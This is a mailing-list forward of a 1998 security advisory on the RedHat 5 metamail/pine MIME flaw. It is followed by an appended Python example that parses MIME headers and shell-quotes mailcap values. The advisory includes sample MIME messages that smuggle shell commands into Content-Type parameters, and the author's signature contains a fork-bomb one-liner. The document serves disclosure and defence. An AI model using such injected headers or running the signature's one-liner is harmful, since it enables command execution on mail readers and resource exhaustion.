
[linux-team] Security hole with mail reader



Go take a look at:

http://www.insecure.org/sploits/redhat.metamail.html


The raw text:
-------------------------------------------------------------------
 
Last modified: Saturday, 24-Apr-1999 21:31:28 PDT


                      RedHat 5 metamail hole

Summary

Description:        Many mail clients, MTAs, etc. are poorly written and
                    can interpret mail in ways that lead to security
                    holes. One of the bugs in this message demonstrates
                    a way to execute arbitrary commands by sending mail
                    to a Redhat 5 user. The bug is in metamail script
                    processing of MIME messages.
Author:             Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Compromise:         potential root (remote). The victim must read the
                    mail with Pine (or something else that calls
                    metamail).
Vulnerable Systems: RedHat 5, other linux boxes with vulnerable metamail
                    script.
Date:               5 April 1998

Details



Date: Sun, 5 Apr 1998 15:25:25 +0200
From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: mailrc and pine security holes

Many mailcap-compatible unix mail clients have several security holes.
The mailcap mechanism is usually so poorly implemented that it's possible
to perform a wide range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via e-mail message.

Here are examples, both tested under the Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):


=======================================
Example 1 (light) - pine 3.96 confusion
=======================================

The following example demonstrates how to cause a few 'mostly harmless'
errors due to the improper expansion of the ` character by pine - it's
just annoying, because you can't view this mail properly, but I
have no idea if it's exploitable:

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: text/plain;
        charset="crashme`"
Content-Transfer-Encoding: quoted-printable

Hellow!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ***


===============================================
Example 2 (heavy) - execution of arbitrary code
===============================================

That's something even more dangerous - the following MIME mail, when viewed,
executes 'touch /tmp/BIG_HOLE' (the bug lies in the metamail script):

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
        encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
Content-Transfer-Encoding: quoted-printable

Hellow!!!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ****

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
To iterate is human, to recurse divine [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]



This page is part of Fyodor's exploit world. For a free program to automate
scanning your network for vulnerable hosts and services, check out my network
mapping tool, nmap.

-------------------------------------------------------------------

Cheers,
 Yo




/----------------------------/
/         M. MASSE           /
/     masse@meon-com.fr      /
/   Mobile 06 60 53 39 94    /
/     Fax 06 61 66 00 14     /
/     Meon Communication     /
/   Comores - Anjouan 88     /
/      521, ch du Puy        /
/      06600 ANTIBES         /
/         FRANCE             /
/----------------------------/
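Both sample messages above work the same way: a header parameter (charset, encoding) ends up spliced into a command line that a shell interprets. The following is an added example, not code from the forwarded post, from metamail or from pine: it parses Content-Type parameters with the RFC 2045 token/quoted-string grammar (so the backslash escapes in Example 2 decode to what the script would actually see), shows that the Example 1 charset is a perfectly legal RFC 2045 token and yet shell-hostile, and contrasts raw mailcap %s/%{charset} substitution with a version that allowlists and shell-quotes every value. The mailcap template and the /tmp/part1 file name are assumptions for illustration; the two headers are taken from the messages above.

```python
"""Parse MIME Content-Type parameters and refuse to pass unsafe values to a shell.

Added example: the two sample headers are copied from the messages above;
TEMPLATE and the part file name are assumptions, not metamail's own entries.
"""
import re
import shlex

# Constructed from the two sample messages above (continuation lines kept).
CT_CRASHME = 'text/plain;\n        charset="crashme`"'
CT_BIGHOLE = ('default;\n        '
              r'encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"')

# Hypothetical mailcap entry of the kind that interpolates a header parameter.
TEMPLATE = 'iconv -f %{charset} %s | less'

TSPECIALS = '()<>@,;:\\"/[]?='                     # RFC 2045 tspecials
SAFE_VALUE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$')
PLACEHOLDER = re.compile(r'%s|%\{([^}]*)\}')       # mailcap %s and %{name}


def _skip_ws(s, i):
    while i < len(s) and s[i] in ' \t':
        i += 1
    return i


def parse_content_type(header):
    """Return (media_type, {name: value}) for a Content-Type field body.

    Values are RFC 2045 tokens or quoted-strings; inside a quoted-string a
    backslash escapes the next character (quoted-pair), so backslash-quote
    decodes to a literal double quote and backslash-space to a space.
    """
    s = re.sub(r'\r?\n[ \t]+', ' ', header)        # unfold continuation lines
    i = _skip_ws(s, 0)
    j = s.find(';', i)
    if j < 0:
        j = len(s)
    media_type = s[i:j].strip().lower()
    params = {}
    i = j
    while i < len(s) and s[i] == ';':
        i = _skip_ws(s, i + 1)
        j = s.find('=', i)
        if j < 0:
            break                                  # malformed parameter, stop
        name = s[i:j].strip().lower()
        i = _skip_ws(s, j + 1)
        if i < len(s) and s[i] == '"':             # quoted-string
            i += 1
            chars = []
            while i < len(s) and s[i] != '"':
                if s[i] == '\\' and i + 1 < len(s):
                    i += 1                         # quoted-pair: next char is literal
                chars.append(s[i])
                i += 1
            i += 1                                 # closing quote
            value = ''.join(chars)
        else:                                      # bare token
            j = i
            while j < len(s) and s[j] not in '; \t':
                j += 1
            value = s[i:j]
            i = j
        params[name] = value
        i = _skip_ws(s, i)
    return media_type, params


def is_rfc2045_token(value):
    """Grammar check only: printable ASCII without tspecials. Backtick, $, |, & all pass."""
    return bool(value) and all(33 <= ord(c) <= 126 and c not in TSPECIALS for c in value)


def is_safe_for_shell(value):
    """Stricter allowlist for anything that will be substituted into a command line."""
    return bool(SAFE_VALUE.match(value))


def expand_mailcap_unsafe(template, filename, params):
    """1998-style expansion: raw substitution of %s and %{name}. Shown only to compare."""
    def repl(m):
        if m.group(1) is None:
            return filename
        return params.get(m.group(1).lower(), '')
    return PLACEHOLDER.sub(repl, template)


def expand_mailcap(template, filename, params):
    """Hardened expansion: reject values off the allowlist, shell-quote everything else."""
    def repl(m):
        if m.group(1) is None:
            return shlex.quote(filename)
        name = m.group(1).lower()
        value = params.get(name, '')
        if not is_safe_for_shell(value):
            raise ValueError('refusing to pass MIME parameter %s=%r to a shell' % (name, value))
        return shlex.quote(value)
    return PLACEHOLDER.sub(repl, template)


if __name__ == '__main__':
    for header in (CT_CRASHME, CT_BIGHOLE):
        mtype, params = parse_content_type(header)
        for name, value in params.items():
            print('%s %s=%r token=%s shell-safe=%s' % (
                mtype, name, value, is_rfc2045_token(value), is_safe_for_shell(value)))
    print(expand_mailcap_unsafe(TEMPLATE, '/tmp/part1', {'charset': 'crashme`'}))
    print(expand_mailcap(TEMPLATE, '/tmp/part1', {'charset': 'iso-8859-2'}))
```

The point of the two checks is that the RFC 2045 grammar is not a security boundary: `crashme\`` is a valid token, so a client that only validates syntax will still hand a backtick to the shell. Anything that reaches a command line needs its own allowlist, and quoting alone is not enough when the template itself wraps the placeholder in single quotes (a value containing `'` then breaks out), which is why the hardened expansion both rejects and quotes.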